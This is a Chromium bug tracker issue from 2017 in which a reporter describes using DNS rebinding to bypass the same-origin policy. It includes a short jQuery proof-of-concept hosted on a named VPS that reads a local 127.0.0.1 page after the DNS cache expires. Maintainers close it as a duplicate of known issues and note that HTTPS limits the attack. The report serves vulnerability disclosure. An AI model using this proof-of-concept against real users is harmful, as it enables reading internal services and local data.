Issue metadata
Sign in to add a comment
|
Security: use dns rebind to bypass sop
Reported by
njupt...@gmail.com,
Jul 23 2017
|
||||||||||||||||||||||
Issue descriptionVERSION Chrome Version: all Operating System: all REPRODUCTION CASE dns rebind can bypass sop to send requests and get response from some website which visist use IP for example ,i start a webserver at my pc php -S 127.0.0.1:80 and then touch a file echo 'here is 127.0.0.1' into index.html then write a poc file such as <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.js"></script> <script> function bypass(){ $.get('/index.html',function(data){alert(data);}); } setTimeout("bypass();",65000); </script> and deploy the file on my vps http://45.78.17.254/rebind.html after that i can use dns rebind to bypass sop rebind.py will attach to the report first dns was 45.78.17.254 and it's ttl=0 and later query will return 127.0.0.1 (dns rebind) chrome's dns cache maybe 60s? so i can settimeout to load source from other domain i attach the file rebind.py you may search to know how to use it i'm so weak in english .... some articles: http://www.bendawang.site/article/%E5%85%B3%E4%BA%8EDNS-rebinding%E7%9A%84%E6%80%BB%E7%BB%93 https://ricterz.me/posts/Use%20DNS%20Rebinding%20to%20Bypass%20IP%20Restriction https://en.wikipedia.org/wiki/DNS_rebinding
,
Jul 23 2017
I see .py script attached, but this bug tracker is for vulnerabilities in Chrome. Do you have an example of HTML/javascript that will cause a remote attack without running any other code on the user's machine?
,
Jul 30 2017
I believe this is a duplicate of Issue 167723 , Issue 438085 , etc. DNS rebinding is longstanding largely unresolved issue in web clients. Fortunately, it fails in the face of HTTPS certificate validation, which is becoming prevalent.
,
Jul 31 2017
Thanks for reporting the issue. It does seem too similar to issue 438085 , though. Please feel free to re-open the bug if there's any difference and highlight it. Thanks.
,
Nov 6 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 Deleted